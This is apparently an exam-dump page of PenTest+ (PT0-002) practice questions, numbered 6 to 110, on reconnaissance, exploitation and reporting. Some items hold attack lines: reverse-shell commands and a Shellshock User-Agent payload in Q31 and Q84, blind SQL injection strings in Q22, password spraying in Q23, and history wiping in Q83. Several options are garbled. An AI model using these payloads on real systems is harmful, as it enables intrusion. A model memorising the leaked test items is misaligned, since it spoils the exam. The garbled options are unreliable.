Weekend Sale - Special 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 70dumps

PT0-002 Questions and Answers

Question # 6
A.

Dynamic binary

B.

Dynamic libraries

C.

Static compilation

D.

Shared objects

Full Access
Question # 7

bash

Copy code

for ip in $(seq 1 254);

do echo $(echo "192.168.15.$ip ") $(host 192.168.15.$ip dns.company.com | grep "domain name pointer")

done | grep "domain name pointer" | cut -d" " -f1,6

Which of the following best explains the purpose of this script?

A.

To query the DNS for IP addresses and corresponding hostnames in a subnet

B.

To output a list of all IP addresses in a subnet for later scanning

C.

To ping every IP address in a subnet to discover live hosts

D.

To search for DNS servers among the IP addresses in a subnet

Full Access
Question # 8

A penetration tester observes an application enforcing strict access controls. Which of the following would allow the tester to bypass these controls and successfully access the organization's sensitive files?

A.

Remote file inclusion

B.

Cross-site scripting

C.

SQL injection

D.

Insecure direct object references

Full Access
Question # 9

During a REST API security assessment, a penetration tester was able to sniff JSON content containing user credentials. The JSON structure was as follows:

<

transaction_id: "1234S6", content: [ {

user_id: "mrcrowley", password: ["€54321#"] b <

user_id: "ozzy",

password: ["1112228"] ) ]

Assuming that the variable json contains the parsed JSON data, which of the following Python code snippets correctly returns the password for the user ozzy?

A.

json['content']['password'][1]

B.

json['user_id']['password'][0][1]

C.

json['content'][1]['password'][0]

D.

json['content'][0]['password'][1]

Full Access
Question # 10

A penetration tester is performing an assessment of an application that allows users to upload documents to a cloud-based file server for easy access anywhere in the world. Which of the following would most likely allow a tester to access unintentionally exposed documents?

A.

Directory traversal attack

B.

Cross-site request forgery

C.

Cross-site scripting attack

D.

Session attack

Full Access
Question # 11

A potential reason for communicating with the client point of contact during a penetration test is to provide resolution if a testing component crashes a system or service and leaves them unavailable for both legitimate users and further testing. Which of the following best describes this concept?

A.

Retesting

B.

De-escalation

C.

Remediation

D.

Collision detection

Full Access
Question # 12

During an assessment, a penetration tester needs to perform a cloud asset discovery of an organization. Which of the following tools would most likely provide more accurate results in this situation?

A.

Pacu

B.

Scout Suite

C.

Shodan

D.

TruffleHog

Full Access
Question # 13

A penetration tester analyzed a web-application log file and discovered an input that was sent to the company's web application. The input contains a string that says "WAITFOR." Which of the following attacks is being attempted?

A.

SQL injection

B.

HTML injection

C.

Remote command injection

D.

DLL injection

Full Access
Question # 14
A.

To identify potential risks and threats during testing

B.

To define the boundaries and objectives

C.

To ensure that all vulnerabilities are identified and addressed

D.

To validate the project timeline and resource allocations

Full Access
Question # 15

During a client engagement, a penetration tester runs the following Nmap command and obtains the following output:

nmap -sV -- script ssl-enum-ciphers -p 443 remotehost

| TLS_ECDHE_ECDSA_WITH_RC4_128_SHA

| TLS_ECDHE_RSA_WITH_RC4_128_SHA

TLS_RSA_WITH_RC4_128_SHA (rsa 2048)

TLS_RSA_WITH_RC4_128_MD5 (rsa 2048)

Which of the following should the penetration tester include in the report?

A.

Old, insecure ciphers are in use.

B.

The 3DES algorithm should be deprecated.

C.

2,048-bit symmetric keys are incompatible with MD5.

D.

This server should be upgraded to TLS 1.2.

Full Access
Question # 16

A penetration tester has been provided with only the public domain name and must enumerate additional information for the public-facing assets.

INSTRUCTIONS

Select the appropriate answer(s), given the output from each section.

Output 1

Full Access
Question # 17

A penetration tester performs several Nmap scans against the web application for a client.

INSTRUCTIONS

Click on the WAF and servers to review the results of the Nmap scans. Then click on

each tab to select the appropriate vulnerability and remediation options.

If at any time you would like to bring back the initial state of the simulation, please

click the Reset All button.

Full Access
Question # 18

A penetration tester is testing a company's public API and discovers that specific input allows the execution of arbitrary commands on the base operating system. Which of the following actions should the penetration tester take next?

A.

Include the findings in the final report.

B.

Notify the client immediately.

C.

Document which commands can be executed.

D.

Use this feature to further compromise the server.

Full Access
Question # 19

A penetration tester wants to crack MD5 hashes more quickly. The tester knows that the first part of the password is Winter followed by four digits and a special character at the end. Which of the following commands should the tester use?

A.

John hash.txt --format-MD5 —wordlist-seasons.txt --fork-8 --rules-base64

B.

hashcat hash.txt -m 0 -a € seasons.txt ?d?d?d?d?s

C.

John hash.txt —format=Raw-MD5 —rules=jumbo —wordlist=seasons.txt

D.

hashcat hahs.txt -m 500 -a 7 —force -) -w 4 —opencl-device-types 1,2

Full Access
Question # 20

A penetration tester was able to gain access to a plaintext file on a user workstation. Upon opening the file, the tester notices some strings of randomly generated text. The tester is able to use these strings to move laterally throughout the network by accessing the fileshare on a web application. Which of the following should the organization do to remediate the issue?

A.

Sanitize user input.

B.

Implement password management solution.

C.

Rotate keys.

D.

Utilize certificate management.

Full Access
Question # 21

Penetration on an assessment for a client organization, a penetration tester notices numerous outdated software package versions were installed ...s-critical servers. Which of the following would best mitigate this issue?

A.

Implementation of patching and change control programs

B.

Revision of client scripts used to perform system updates

C.

Remedial training for the client's systems administrators

D.

Refrainment from patching systems until quality assurance approves

Full Access
Question # 22

During an assessment of a web application, a penetration tester would like to test the application for blind SQL injection. Which of the following techniques should the penetration tester perform next?

A.

1" ORDER BY 1—+

B.

"; IF (1 = 1) WA1TFOR DELAY '0:0:10* —

C.

xyz' AND '!' = "1

D.

xyz' AND (SELECT CASE WHEN (1-1) THEN 1/0 ELSE *a* END)-'a)

Full Access
Question # 23

A penetration tester wants to find the password for any account in the domain without locking any of the accounts. Which of the following commands should the tester use?

A.

enum4linux -u userl -p /passwordList.txt 192.168.0.1

B.

enum4linux -u userl -p Passwordl 192.168.0.1

C.

cme smb 192.168.0.0/24 -u /userList.txt -p /passwordList.txt

D.

cme smb 192.168.0.0/24 -u /userList.txt -p Summer123

Full Access
Question # 24

A penetration tester managed to get control of an internal web server that is hosting the IT knowledge base. Which of the following attacks should the penetration tester attempt next?

A.

Vishing

B.

Watering hole

C.

Whaling

D.

Spear phishing

Full Access
Question # 25

A penetration tester is trying to bypass an active response tool that blocks IP addresses that have more than 100 connections per minute. Which of the following commands would allow the tester to finish the test without being blocked?

A.

nmap -sU -p 1-1024 10.0.0.15

B.

nmap -p 22,25, 80, 3389 -T2 10.0.0.15 -Pn

C.

nmap -T5 -p 1-65535 -A 10.0.0.15

D.

nmap -T3 -F 10.0.0.15

Full Access
Question # 26

During a code review assessment, a penetration tester finds the following vulnerable code inside one of the web application files:

<% String id = request.getParameter("id"); %>

Employee ID: <%= id %>

Which of the following is the best remediation to prevent a vulnerability from being exploited, based on this code?

A.

Parameterized queries

B.

Patch application

C.

Output encoding

Full Access
Question # 27

A penetration tester is performing DNS reconnaissance and has obtained the following output using different dig comrr

;; ANSWER SECTION

company.com.5INMX10 mxa.company.com

company.com.5IN-MX10 mxb.company.com

company.com.5INMX100 mxc.company.com

;; ANSWER SECTION company.com.5INA120.73.220.53

;; ANSWER SECTION company.com.5INNSnsl.nsvr.com

Which of the following can be concluded from the output the penetration tester obtained?

A.

mxc.company.com is the preferred mail server.

B.

The company.com record can be cached for five minutes.

C.

The company's website is hosted at 120.73.220.53.

D.

The nameservers are not redundant.

Full Access
Question # 28

An executive needs to use Wi-Fi to connect to the company's server while traveling. While looking for available Wi-Fi connections, the executive notices an available access point to a hotel chain that is not available where the executive is staying. Which of the following attacks is the executive most likely experiencing?

A.

Data modification

B.

Amplification

C.

Captive portal

D.

Evil twin

Full Access
Question # 29

A penetration tester is performing an assessment for an organization and must gather valid user credentials. Which of the following attacks would be best for the tester to use to achieve this objective?

A.

Wardriving

B.

Captive portal

C.

Deauthentication

D.

Impersonation

Full Access
Question # 30

A security consultant wants to perform a vulnerability assessment with an application that can effortlessly generate an easy-to-read report. Which of the following should the attacker use?

A.

Brakeman

B.

Nessus

C.

Metasploit

D.

SCAP

Full Access
Question # 31

After compromising a remote host, a penetration tester is able to obtain a web shell. A firewall is blocking outbound traffic. Which of the following commands would allow the penetration tester to obtain an interactive shell on the remote host?

A.

bash -i >& /dev/tcp 8443 0>&l

B.

nc -e host 8443 /bin/bash

C.

nc -vlp 8443 /bin/bash

D.

nc -vp 8443 /bin/bash

Full Access
Question # 32

During a security assessment of a web application, a penetration tester was able to generate the following application response:

Unclosed quotation mark after the character string Incorrect syntax near ".

Which of the following is the most probable finding?

A.

SQL injection

B.

Cross-site scripting

C.

Business logic flaw

D.

Race condition

Full Access
Question # 33

A penetration tester enters a command into the shell and receives the following output:

C:\Users\UserX\Desktop>vmic service get name, pathname, displayname, startmode | findstr /i auto | findstr /i /v |C:\\Windows\\" I findstr /i /v""

VulnerableService Some Vulnerable Service C:\Program Files\A Subfolder\B Subfolder\SomeExecutable.exe Automatic

Which of the following types of vulnerabilities does this system contain?

A.

Unquoted service path

B.

Writable services

C.

Clear text credentials

D.

Insecure file/folder permissions

Full Access
Question # 34

A penetration tester is conducting an assessment on a web application. Which of the following active reconnaissance techniques would be best for the tester to use to gather additional information about the application?

A.

Using cURL with the verbose option

B.

Crawling UR Is using an interception proxy

C.

Using Scapy for crafted requests

D.

Crawling URIs using a web browser

Full Access
Question # 35

During an assessment, a penetration tester found an application with the default credentials enabled. Which of the following best describes the technical control required to fix this issue?

A.

Password encryption

B.

System hardening

C.

Multifactor authentication

D.

Patch management

Full Access
Question # 36

Which of the following describes a globally accessible knowledge base of adversary tactics and techniques based on real-world observations?

A.

OWASP Top 10

B.

MITRE ATT&CK

C.

Cyber Kill Chain

D.

Well-Architected Framework

Full Access
Question # 37

A penetration tester noticed that an employee was using a wireless headset with a smartphone. Which of the following methods would be best to use to intercept the communications?

A.

Multiplexing

B.

Bluejacking

C.

Zero-day attack

D.

Smurf attack

Full Access
Question # 38

A penetration tester would like to know if any web servers or mail servers are running on the in-scope network segment. Which of the following is the best to use in this scenario?

A.

ARP scans

B.

Website crawling

C.

DNS lookups

D.

Nmap probes

Full Access
Question # 39

A penetration tester requested, without express authorization, that a CVE number be assigned for a new vulnerability found on an internal client application. Which of the following did the penetration tester most likely breach?

A.

ROE

B.

SLA

C.

NDA

D.

SOW

Full Access
Question # 40

An organization is using Android mobile devices but does not use MDM services. Which of the following describes an existing risk present in this scenario?

A.

Device log facility does not record actions.

B.

End users have root access by default.

C.

Unsigned applications can be installed.

D.

Push notification services require internet.

Full Access
Question # 41

Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)

A.

The CVSS score of the finding

B.

The network location of the vulnerable device

C.

The vulnerability identifier

D.

The client acceptance form

E.

The name of the person who found the flaw

F.

The tool used to find the issue

Full Access
Question # 42

A penetration tester is testing input validation on a search form that was discovered on a website. Which of the following characters is the BEST option to test the website for vulnerabilities?

A.

Comma

B.

Double dash

C.

Single quote

D.

Semicolon

Full Access
Question # 43

A penetration tester runs a reconnaissance script and would like the output in a standardized machine-readable format in order to pass the data to another application. Which of the following is the best for the tester to use?

A.

JSON

B.

Lists

C.

XLS

D.

Trees

Full Access
Question # 44

An Nmap network scan has found five open ports with identified services. Which of the following tools should a penetration tester use NEXT to determine if any vulnerabilities with associated exploits exist on the open ports?

A.

OpenVAS

B.

Drozer

C.

Burp Suite

D.

OWASP ZAP

Full Access
Question # 45

A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

A.

Hydra and crunch

B.

Netcat and cURL

C.

Burp Suite and DIRB

D.

Nmap and OWASP ZAP

Full Access
Question # 46

Which of the following BEST describe the OWASP Top 10? (Choose two.)

A.

The most critical risks of web applications

B.

A list of all the risks of web applications

C.

The risks defined in order of importance

D.

A web-application security standard

E.

A risk-governance and compliance framework

F.

A checklist of Apache vulnerabilities

Full Access
Question # 47
A.

Burp Suite

B.

Wireshark

C.

Metasploit

D.

Nmap

Full Access
Question # 48

A penetration tester is enumerating shares and receives the following output:

Which of the following should the penetration tester enumerate next?

A.

dev

B.

print$

C.

home

D.

notes

Full Access
Question # 49

A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company’s network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.

Which of the following actions should the tester take?

A.

Perform forensic analysis to isolate the means of compromise and determine attribution.

B.

Incorporate the newly identified method of compromise into the red team’s approach.

C.

Create a detailed document of findings before continuing with the assessment.

D.

Halt the assessment and follow the reporting procedures as outlined in the contract.

Full Access
Question # 50

A company has hired a penetration tester to deploy and set up a rogue access point on the network.

Which of the following is the BEST tool to use to accomplish this goal?

A.

Wireshark

B.

Aircrack-ng

C.

Kismet

D.

Wifite

Full Access
Question # 51

An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client’s information?

A.

Follow the established data retention and destruction process

B.

Report any findings to regulatory oversight groups

C.

Publish the findings after the client reviews the report

D.

Encrypt and store any client information for future analysis

Full Access
Question # 52

A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?

A.

Cross-site request forgery

B.

Server-side request forgery

C.

Remote file inclusion

D.

Local file inclusion

Full Access
Question # 53

Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?

A.

Acceptance by the client and sign-off on the final report

B.

Scheduling of follow-up actions and retesting

C.

Attestation of findings and delivery of the report

D.

Review of the lessons learned during the engagement

Full Access
Question # 54

Which of the following provides a matrix of common tactics and techniques used by attackers along with recommended mitigations?

A.

NIST SP 800-53

B.

OWASP Top 10

C.

MITRE ATT&CK framework

D.

PTES technical guidelines

Full Access
Question # 55

A software company has hired a penetration tester to perform a penetration test on a database server. The tester has been given a variety of tools used by the company’s privacy policy. Which of the following would be the BEST to use to find vulnerabilities on this server?

A.

OpenVAS

B.

Nikto

C.

SQLmap

D.

Nessus

Full Access
Question # 56

A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?

A.

Steganography

B.

Metadata removal

C.

Encryption

D.

Encode64

Full Access
Question # 57

Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?

A.

S/MIME

B.

FTPS

C.

DNSSEC

D.

AS2

Full Access
Question # 58

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part 1: Given the output, construct the command that was used to generate this output from the available options.

Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Full Access
Question # 59

A penetration tester ran a ping –A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?

A.

Windows

B.

Apple

C.

Linux

D.

Android

Full Access
Question # 60

The attacking machine is on the same LAN segment as the target host during an internal penetration test. Which of the following commands will BEST enable the attacker to conduct host delivery and write the discovery to files without returning results of the attack machine?

A.

nmap snn exclude 10.1.1.15 10.1.1.0/24 oA target_txt

B.

nmap גiR10oX out.xml | grep גNmapג | cut d ג"f5 > live-hosts.txt

C.

nmap גPnsV OiL target.txt גA target_text_Service

D.

nmap גsSPn n iL target.txt גA target_txtl

Full Access
Question # 61

A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?

A.

Add a dependency checker into the tool chain.

B.

Perform routine static and dynamic analysis of committed code.

C.

Validate API security settings before deployment.

D.

Perform fuzz testing of compiled binaries.

Full Access
Question # 62

A company hired a penetration tester to do a social-engineering test against its employees. Although the tester did not find any employees’ phone numbers on the company’s website, the tester has learned the complete phone catalog was published there a few months ago.

In which of the following places should the penetration tester look FIRST for the employees’ numbers?

A.

Web archive

B.

GitHub

C.

File metadata

D.

Underground forums

Full Access
Question # 63

A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability.

Which of the following is the BEST way to ensure this is a true positive?

A.

Run another scanner to compare.

B.

Perform a manual test on the server.

C.

Check the results on the scanner.

D.

Look for the vulnerability online.

Full Access
Question # 64

Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

A.

Analyze the malware to see what it does.

B.

Collect the proper evidence and then remove the malware.

C.

Do a root-cause analysis to find out how the malware got in.

D.

Remove the malware immediately.

E.

Stop the assessment and inform the emergency contact.

Full Access
Question # 65

A penetration tester has been hired to configure and conduct authenticated scans of all the servers on a software company’s network. Which of the following accounts should the tester use to return the MOST results?

A.

Root user

B.

Local administrator

C.

Service

D.

Network administrator

Full Access
Question # 66

A penetration tester who is doing a company-requested assessment would like to send traffic to another system using double tagging. Which of the following techniques would BEST accomplish this goal?

A.

RFID cloning

B.

RFID tagging

C.

Meta tagging

D.

Tag nesting

Full Access
Question # 67

A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be

valid?

A.

PLCs will not act upon commands injected over the network.

B.

Supervisors and controllers are on a separate virtual network by default.

C.

Controllers will not validate the origin of commands.

D.

Supervisory systems will detect a malicious injection of code/commands.

Full Access
Question # 68

A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

A.

Weekly

B.

Monthly

C.

Quarterly

D.

Annually

Full Access
Question # 69

When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?

A.

Clarify the statement of work.

B.

Obtain an asset inventory from the client.

C.

Interview all stakeholders.

D.

Identify all third parties involved.

Full Access
Question # 70

A company recruited a penetration tester to configure wireless IDS over the network. Which of the following tools would BEST test the effectiveness of the wireless IDS solutions?

A.

Aircrack-ng

B.

Wireshark

C.

Wifite

D.

Kismet

Full Access
Question # 71

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

A.

Buffer overflows

B.

Cross-site scripting

C.

Race-condition attacks

D.

Zero-day attacks

E.

Injection flaws

F.

Ransomware attacks

Full Access
Question # 72

Which of the following documents describes specific activities, deliverables, and schedules for a penetration tester?

A.

NDA

B.

MSA

C.

SOW

D.

MOU

Full Access
Question # 73

A penetration tester is exploring a client’s website. The tester performs a curl command and obtains the following:

* Connected to 10.2.11.144 (::1) port 80 (#0)

> GET /readmine.html HTTP/1.1

> Host: 10.2.11.144

> User-Agent: curl/7.67.0

> Accept: */*

>

* Mark bundle as not supporting multiuse

< HTTP/1.1 200

< Date: Tue, 02 Feb 2021 21:46:47 GMT

< Server: Apache/2.4.41 (Debian)

< Content-Length: 317

< Content-Type: text/html; charset=iso-8859-1

<

WordPress › ReadMe

Which of the following tools would be BEST for the penetration tester to use to explore this site further?

A.

Burp Suite

B.

DirBuster

C.

WPScan

D.

OWASP ZAP

Full Access
Question # 74

A company conducted a simulated phishing attack by sending its employees emails that included a link to a site that mimicked the corporate SSO portal. Eighty percent of the employees who received the email clicked the link and provided their corporate credentials on the fake site. Which of the following recommendations would BEST address this situation?

A.

Implement a recurring cybersecurity awareness education program for all users.

B.

Implement multifactor authentication on all corporate applications.

C.

Restrict employees from web navigation by defining a list of unapproved sites in the corporate proxy.

D.

Implement an email security gateway to block spam and malware from email communications.

Full Access
Question # 75

A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables.

Which of the following should be included as a recommendation in the remediation report?

A.

Stronger algorithmic requirements

B.

Access controls on the server

C.

Encryption on the user passwords

D.

A patch management program

Full Access
Question # 76

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

A.

<#

B.

<$

C.

##

D.

#$

E.

#!

Full Access
Question # 77

A company is concerned that its cloud VM is vulnerable to a cyberattack and proprietary data may be stolen. A penetration tester determines a vulnerability does exist and exploits the vulnerability by adding a fake VM instance to the IaaS component of the client's VM. Which of the following cloud attacks did the penetration tester MOST likely implement?

A.

Direct-to-origin

B.

Cross-site scripting

C.

Malware injection

D.

Credential harvesting

Full Access
Question # 78

A penetration tester discovers passwords in a publicly available data breach during the reconnaissance phase of the penetration test. Which of the following is the best action for the tester to take?

A.

Add thepasswords to an appendix in the penetration test report.

B.

Do nothing. Using passwords from breached data is unethical.

C.

Contactthe client and inform them of the breach.

D.

Use thepasswords in a credential stuffing attack when the external penetration test begins.

Full Access
Question # 79

Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

A.

A quick description of the vulnerability and a high-level control to fix it

B.

Information regarding the business impact if compromised

C.

The executive summary and information regarding the testing company

D.

The rules of engagement from the assessment

Full Access
Question # 80

A penetration tester has found indicators that a privileged user's password might be the same on 30 different Linux systems. Which of the following tools can help the tester identify the number of systems on which the password can be used?

A.

Hydra

B.

John the Ripper

C.

Cain and Abel

D.

Medusa

Full Access
Question # 81

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

A.

Unsupported operating systems

B.

Susceptibility to DDoS attacks

C.

Inability to network

D.

The existence of default passwords

Full Access
Question # 82

Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:

A.

devices produce more heat and consume more power.

B.

devices are obsolete and are no longer available for replacement.

C.

protocols are more difficult to understand.

D.

devices may cause physical world effects.

Full Access
Question # 83

A penetration tester gains access to a system and establishes persistence, and then runs the following commands:

cat /dev/null > temp

touch –r .bash_history temp

mv temp .bash_history

Which of the following actions is the tester MOST likely performing?

A.

Redirecting Bash history to /dev/null

B.

Making a copy of the user's Bash history for further enumeration

C.

Covering tracks by clearing the Bash history

D.

Making decoy files on the system to confuse incident responders

Full Access
Question # 84

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

A.

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

B.

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

C.

exploits = {“User-Agent”: “() { ignored;};/bin/sh –i ps –ef” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

D.

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/10.10.1.1/80” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

Full Access
Question # 85

Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?

A.

To remove hash-cracking registry entries

B.

To remove the tester-created Mimikatz account

C.

To remove tools from the server

D.

To remove a reverse shell from the system

Full Access
Question # 86

A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)

A.

Wireshark

B.

Nessus

C.

Retina

D.

Burp Suite

E.

Shodan

F.

Nikto

Full Access
Question # 87

A penetration tester is reviewing the following DNS reconnaissance results for comptia.org from dig:

comptia.org. 3569 IN MX comptia.org-mail.protection.outlook.com. comptia.org. 3569 IN A 3.219.13.186. comptia.org.

3569 IN NS ns1.comptia.org. comptia.org. 3569 IN SOA haven. administrator.comptia.org. comptia.org. 3569 IN MX new.mx0.comptia.org. comptia.org. 3569 IN MX new.mx1.comptia.org.

Which of the following potential issues can the penetration tester identify based on this output?

A.

At least one of the records is out of scope.

B.

There is a duplicate MX record.

C.

The NS record is not within the appropriate domain.

D.

The SOA records outside the comptia.org domain.

Full Access
Question # 88

User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

A.

MD5

B.

bcrypt

C.

SHA-1

D.

PBKDF2

Full Access
Question # 89

Which of the following tools provides Python classes for interacting with network protocols?

A.

Responder

B.

Impacket

C.

Empire

D.

PowerSploit

Full Access
Question # 90

A penetration tester is able to capture the NTLM challenge-response traffic between a client and a server.

Which of the following can be done with the pcap to gain access to the server?

A.

Perform vertical privilege escalation.

B.

Replay the captured traffic to the server to recreate the session.

C.

Use John the Ripper to crack the password.

D.

Utilize a pass-the-hash attack.

Full Access
Question # 91

A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

A.

Alternate data streams

B.

PowerShell modules

C.

MP4 steganography

D.

PsExec

Full Access
Question # 92

A penetration tester runs an Nmap scan and obtains the following output:

Starting Nmap 7.80 ( https://nmap.org ) at 2023-02-12 18:53 GMT

Nmap scan report for 10.22.2.2

Host is up (0.0011s latency).

PORTSTATE SERVICEVERSION

135/tcpopen msrpcMicrosoft Windows RPC

139/tcpopen netbios-ssnMicrosoft Windows netbios-ssn

445/tcpopen microsoft-dsMicrosoft Windows Server 2019

1433/tcpopen ms-sql-sMicrosoft SQL Server 2019

3389/tcpopen ms-wbt-serverMicrosoft Terminal Services

8080/tcpopen httpMicrosoft IIS 9.0

Which of the following commands should the penetration tester try next to explore this server?

A.

nikto -host http://10.22.2-2

B.

hydra -1 administrator -P passwords.txt ftp://10.22.2.2

C.

nmap -p 3389 —script vnc-info.nse 10.22.2.2

D.

medusa -h 10.22.2.2 -n 1433 -u sa -P passwords.txt -M mssql

Full Access
Question # 93

Given the following table:

Which of the following data structures would most likely be used to store known-good configurations of firewall rules in a Python script?

A.

Lists

B.

Trees

C.

Dictionaries

D.

Tuples

Full Access
Question # 94
A.

Configure to stop broadcasting the SSID

B.

Using directional antennas

C.

Using WEP encryption

D.

Disabling Wi-Fi

Full Access
Question # 95

During a penetration test, a tester is able to change values in the URL from example.com/login.php?id=5 to example.com/login.php?id=10 and gain access to a web application. Which of the following vulnerabilities has the penetration tester exploited?

A.

Command injection

B.

Broken authentication

C.

Direct object reference

D.

Cross-site scripting

Full Access
Question # 96

Which of the following documents must be signed between the penetration tester and the client to govern how any provided information is managed before, during, and after the engagement?

A.

MSA

B.

NDA

C.

SOW

D.

ROE

Full Access
Question # 97

Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up a fake log-in page and harvest credentials when target employees click on links in a phishing email. Which of the following commands would best help the tester determine which cloud email provider the log-in page needs to mimic?

A.

dig company.com MX

B.

whois company.com

C.

cur1 www.company.com

D.

dig company.com A

Full Access
Question # 98

The delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted. Which of the following BEST identifies this concept?

A.

Statement of work

B.

Program scope

C.

Non-disclosure agreement

D.

Rules of engagement

Full Access
Question # 99

A penetration tester is conducting a penetration test. The tester obtains a root-level shell on a Linux server and discovers the following data in a file named password.txt in the /home/svsacct directory:

U3VQZXIkM2NyZXQhCg==

Which of the following commands should the tester use NEXT to decode the contents of the file?

A.

echo U3VQZXIkM2NyZXQhCg== | base64 ג€"d

B.

tar zxvf password.txt

C.

hydra ג€"l svsacct ג€"p U3VQZXIkM2NyZXQhCg== ssh://192.168.1.0/24

D.

john --wordlist /usr/share/seclists/rockyou.txt password.txt

Full Access
Question # 100

A penetration tester was contracted to test a proprietary application for buffer overflow vulnerabilities. Which of the following tools would be BEST suited for this task?

A.

GDB

B.

Burp Suite

C.

SearchSpliot

D.

Netcat

Full Access
Question # 101

A physical penetration tester needs to get inside an organization's office and collect sensitive information without acting suspiciously or being noticed by the security guards. The tester has observed that the company's ticket gate does not scan the badges, and employees leave their badges on the table while going to the restroom. Which of the following techniques can the tester use to gain physical access to the office? (Choose two.)

A.

Shoulder surfing

B.

Call spoofing

C.

Badge stealing

D.

Tailgating

E.

Dumpster diving

F.

Email phishing

Full Access
Question # 102

A penetration tester needs to perform a vulnerability scan against a web server. Which of the following tools is the tester MOST likely to choose?

A.

Nmap

B.

Nikto

C.

Cain and Abel

D.

Ethercap

Full Access
Question # 103

Penetration tester is developing exploits to attack multiple versions of a common software package. The versions have different menus and )ut.. they have a common log-in screen that the exploit must use. The penetration tester develops code to perform the log-in that can be each of the exploits targeted to a specific version. Which of the following terms is used to describe this common log-in code example?

A.

Conditional

B.

Library

C.

Dictionary

D.

Sub application

Full Access
Question # 104

Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?

A.

Executive summary

B.

Remediation

C.

Methodology

D.

Metrics and measures

Full Access
Question # 105

A security analyst needs to perform an on-path attack on BLE smart devices. Which of the following tools would be BEST suited to accomplish this task?

A.

Wireshark

B.

Gattacker

C.

tcpdump

D.

Netcat

Full Access
Question # 106

A penetration tester is required to perform a vulnerability scan that reduces the likelihood of false positives and increases the true positives of the results. Which of the following would MOST likely accomplish this goal?

A.

Using OpenVAS in default mode

B.

Using Nessus with credentials

C.

Using Nmap as the root user

D.

Using OWASP ZAP

Full Access
Question # 107

A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement. Which of the

following is the BEST option for the tester to take?

A.

Segment the firewall from the cloud.

B.

Scan the firewall for vulnerabilities.

C.

Notify the client about the firewall.

D.

Apply patches to the firewall.

Full Access
Question # 108

During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred?

A.

The SSL certificates were invalid.

B.

The tester IP was blocked.

C.

The scanner crashed the system.

D.

The web page was not found.

Full Access
Question # 109

During an engagement, a penetration tester found the following list of strings inside a file:

Which of the following is the BEST technique to determine the known plaintext of the strings?

A.

Dictionary attack

B.

Rainbow table attack

C.

Brute-force attack

D.

Credential-stuffing attack

Full Access
Question # 110

A penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the local cache. The attacker machine has the following:

IP Address: 192.168.1.63

Physical Address: 60-36-dd-a6-c5-33

